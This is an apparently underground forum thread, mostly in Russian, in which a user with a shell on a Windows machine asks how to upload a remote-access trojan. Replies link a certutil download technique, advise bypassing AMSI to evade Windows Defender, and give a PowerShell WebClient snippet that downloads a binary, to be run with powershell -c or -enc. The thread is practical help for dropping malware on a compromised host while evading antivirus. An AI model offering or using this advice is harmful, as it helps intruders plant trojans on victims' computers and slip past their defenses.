Залить RAT через PowerShell

[0xtr1p]

Есть шелл на винде, как залить exe файл трояна?

 

[waahoo]

https://www.ired.team/offensive-security/defense-evasion/downloading-file-with-certutil

 

[WellDone]

"Скачать файл повершелл" в гугл, очень сложно, понимаю

 

[s0nus]

Well, there are many ways for do that, also, certutil is detected by windows defender. My suggestion: Bypass amsi, then use webclient (Invoke-WebRequest is very detected as well) to download the binary file to a safe location (like: $env : temp, \Users\Public\Documents, etc) and then run it.

 

[Meb]

https://www.ired.team/offensive-security/defense-evasion/downloading-file-with-certutil

И почти каждый ав передаст тебе привет после такого, проще так:

$src = "";
$dest = "";
(New-Object Net.WebClient).DownloadFile("$src", "$dest");

a запускать через powershell -c или -enc